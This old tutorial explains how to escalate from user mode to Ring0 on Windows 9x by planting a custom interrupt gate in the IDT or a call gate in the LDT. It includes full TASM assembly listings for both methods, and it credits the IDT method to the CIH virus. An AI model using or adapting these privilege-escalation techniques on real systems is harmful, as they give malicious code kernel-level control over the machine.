This article gives a short overview over two ways to go Ring0 in Windows 9x in
an undocumented way, exploiting the fact that none of the important system
tables in Win9x are on pages which are protected from low-privilege access.
A basic knowledge of Protected Mode and OS Internals are required, refer to
your Assembly Book for that :-) The techniques presented here are in no way a
good/clean way to get to a higher privilege level, but since they require only
a minimal coding effort, they are sometimes more desirable to implement than a
full-fledged VxD.
1. Introduction
Under all modern Operating Systems, the CPU runs in protected mode, taking
advantage of the special features of this mode to implementvirtual memory,
multitasking etc. To manage access to system-critical resources (and to thus
provide stability) a OS is in need of privilege levels, so that a program can't
just switch out of protected mode etc. These privilege levels are represented
on the x86 (I refer to x86 meaning 386 and following) CPU by 'Rings', with
Ring0 being the most privileged and Ring3 being the least privileged level.
Theoretically, the x86 is capable of 4 privilege levels, but Win32 uses only
two of them, Ring0 as 'Kernel Mode' and Ring3 as 'User Mode'.
Since Ring0 is not needed by 99% of all applications, the only documented way
to use Ring0 routines in Win9x is through VxDs. But VxDs, while being the only
stable and recommended way, are work to write and big, so in a couple of
specialized situations, other ways to go Ring0 are useful.
The CPU itself handles privilege level transitions in two ways: Through
Exceptions/Interrupts and through Callgates. Callgates can be put in the LDT or
GDT, Interrupt-Gates are found in the IDT.
We'll take advantage of the fact that these tables can be freely written to
from Ring3 in Win9x (NOT IN NT !).
2. The IDT method
If an exception occurs (or is triggered), the CPU looks in the IDT to the
corresponding descriptor. This descriptor gives the CPU an Address and Segment
to transfer control to. An Interrupt Gate descriptor looks like this:
D D
1.Offset (16-31) P P P 0 1 1 1 0 0 0 0 R R R R R +4
L L
--------------------------------- ---------------------------------
2.Segment Selector 3.Offset (0-15) 0
--------------------------------- ---------------------------------
DPL == Two bits containing the Descriptor Privilege Level
P == Present bit
R == Reserved bits
The first word (Nr.3) contains the lower word of the 32-bit address of the
Exception Handler. The word at +6 contains the high-order word. The word at +2
is the selector of the segment in which the handler resides.
The word at +4 identifies the descriptor as Interrupt Gate, contains its
privilege and the present bit. Now, to use the IDT to go Ring0, we'll create a
new Interrupt Gate which points to our Ring0 procedure, save an old one and
replace it with ours.
Then we'll trigger that exception. Instead of passing control to Window's own
handler, the CPU will now execute our Ring0 code. As soon as we're done, we'll
restore the old Interrupt Gate.
In Win9x, the selector 0028h always points to a Ring0-Code Segment, which spans
the entire 4 GB address range. We'll use this as our Segment selector.
The DPL has to be 3, as we're calling from Ring3, and the present bit must be
set. So the word at +4 will be 1110111000000000b => EE00h. These values can
be hardcoded into our program, we have to just add the offset of our Ring0
Procedure to the descriptor. As exception, you should preferrably use one that
rarely occurs, so do not use int 14h ;-)
I'll use int 9h, since it is (to my knowledge) not used on 486+.
Example code follows (to be compiled with TASM 5):
-------------------------------- bite here -----------------------------------
.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL
EXTRN ExitProcess : PROC
.data
IDTR df 0 ; This will receive the contents of the IDTR
; register
SavedGate dq 0 ; We save the gate we replace in here
OurGate dw 0 ; Offset low-order word
dw 028h ; Segment selector
dw 0EE00h ;
dw 0 ; Offset high-order word
.code
- Start
-
mov eax, offset Ring0Proc
mov [OurGate], ax ; Put the offset words
shr eax, 16 ; into our descriptor
mov [OurGate+6], ax
sidt fword ptr IDTR
mov ebx, dword ptr [IDTR+2] ; load IDT Base Address
add ebx, 8*9 ; Address of int9 descriptor in ebx
mov edi, offset SavedGate
mov esi, ebx
movsd ; Save the old descriptor
movsd ; into SavedGate
mov edi, ebx
mov esi, offset OurGate
movsd ; Replace the old handler
movsd ; with our new one
int 9h ; Trigger the exception, thus
; passing control to our Ring0
; procedure
mov edi, ebx
mov esi, offset SavedGate
movsd ; Restore the old handler
movsd
call ExitProcess, LARGE -1
Ring0Proc PROC
Ring0Proc ENDP
end Start
-------------------------------- bite here -----------------------------------
3. The LDT Method
Another possibility of executing Ring0-Code is to install a so- called callgate
in either the GDT or LDT. Under Win9x it is a little bit easier to use the LDT,
since the first 16 descriptors in it are always empty, so I will only give
source for that method here.
A Callgate is similar to a Interrupt Gate and is used in order to transfer
control from a low-privileged segment to a high-privileged segment using a CALL
instruction.
The format of a callgate is:
D D D D D D
1.Offset (16-31) P P P 0 1 1 0 0 0 0 0 0 W W W W +4
L L C C C C
--------------------------------- ---------------------------------
2.Segment Selector 3.Offset (0-15) 0
--------------------------------- ---------------------------------
P == Present bit
DPL == Descriptor Privilege Level
DWC == Dword Count, number of arguments copied to the ring0 stack
So all we have to do is to create such a callgate, write it into one of the
first 16 descriptors, then do a far call to that descriptor to execute our
Ring0 code.
Example Code:
-------------------------------- bite here -----------------------------------
.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL
EXTRN ExitProcess : PROC
.data
GDTR df 0 ; This will receive the contents of the IDTR
; register
CallPtr dd 00h ; As we're using the first descriptor (8) and
dw 0Fh ; its located in the LDT and the privilege level
; is 3, our selector will be 000Fh.
; That is because the low-order two bits of the
; selector are the privilege level, and the 3rd
; bit is set if the selector is in the LDT.
OurGate dw 0 ; Offset low-order word
dw 028h ; Segment selector
dw 0EC00h ;
dw 0 ; Offset high-order word
.code
- Start
-
mov eax, offset Ring0Proc
mov [OurGate], ax ; Put the offset words
shr eax, 16 ; into our descriptor
mov [OurGate+6], ax
xor eax, eax
sgdt fword ptr GDTR
mov ebx, dword ptr [GDTR+2] ; load GDT Base Address
sldt ax
add ebx, eax ; Address of the LDT descriptor in
; ebx
mov al, [ebx+4] ; Load the base address
mov ah, [ebx+7] ; of the LDT itself into
shl eax, 16 ; eax, refer to your pmode
mov ax, [ebx+2] ; manual for details
add eax, 8 ; Skip NULL Descriptor
mov edi, eax
mov esi, offset OurGate
movsd ; Move our custom callgate
movsd ; into the LDT
call fword ptr [CallPtr] ; Execute the Ring0 Procedure
xor eax, eax ; Clean up the LDT
sub edi, 8
stosd
stosd
call ExitProcess, LARGE -1
Ring0Proc PROC
Ring0Proc ENDP
end Start
-------------------------------- bite here -----------------------------------
Well, that's all for now folks. This method can be easily changedto use the GDT
instead which would save a few bytes in case you have to optimize heavily.
Anyways, do use these methods with care, they will NOT run on NT and are
generally not exactly a clean or stable way to do these things.
Credits & Thanks
The IDT-Method taken from the CIH virus & Stone's example source at
{ http://www.cracking.net.}
The LDT-Method was done by me, but without IceMans & The_Owls help I would
still be stuck, so all credits go to them.
|